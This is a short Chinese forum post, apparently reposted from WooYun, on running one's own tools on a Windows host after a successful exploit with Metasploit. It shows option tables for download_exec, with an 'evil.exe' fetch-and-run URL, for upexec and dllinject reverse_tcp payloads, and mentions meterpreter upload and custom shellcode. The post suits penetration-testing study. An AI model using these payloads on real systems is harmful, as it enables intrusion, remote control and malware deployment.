|
|
在某些溢出成功后,我们需要运行自己的模块,如远控、扫描器等,可以使用下面的一些方法:
0x01.利用其他后渗透模块驱动执行,如使用meterpreter脚本,获得sessions后使用meterpreter来进行上传和执行
0x02.利用windows/download_exec模块,下载执行:
模块信息:Name Current Setting Required Description
---- --------------- -------- -----------
EXE rund11.exe yes Filename to save & run executable on target system
EXITFUNC process yes Exit technique: seh, thread, process, none
URL http://localhost:443/evil.exe yes The pre-encoded URL to the executable
复制代码这个模块的脚本,分为下载和执行,代码在/opt/metasploit/msf3/modules/payloads/singles/windows/download_exec.rb
复制代码代码很清晰,可以学习相关写法
0x03 利用payload/windows/upexec/下的相关模块直接上传执行:
模块信息:Module options (payload/windows/upexec/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC process yes Exit technique: seh, thread, process, none
LHOST yes The listen address
LPORT 4444 yes The listen port
PEXEC yes Full path to the file to upload and execute
复制代码模块中设置反弹模块为有效即可
0x04 利用payload/windows/dllinject/reverse_tcp模块进行远程dll注入
模块信息:
代码Name Current Setting Required Description
---- --------------- -------- -----------
DLL yes The local path to the Reflective DLL to upload
EXITFUNC process yes Exit technique: seh, thread, process, none
LHOST yes The listen address
LPORT 4444 yes The listen port
复制代码模块中设置反弹模块为有效即可
0x05 自定义脚本
自定义shellcode:http://bbs.pediy.com/showthread.php?t=109523
转自乌云 |
|
发表于 2013-2-4 16:25:39
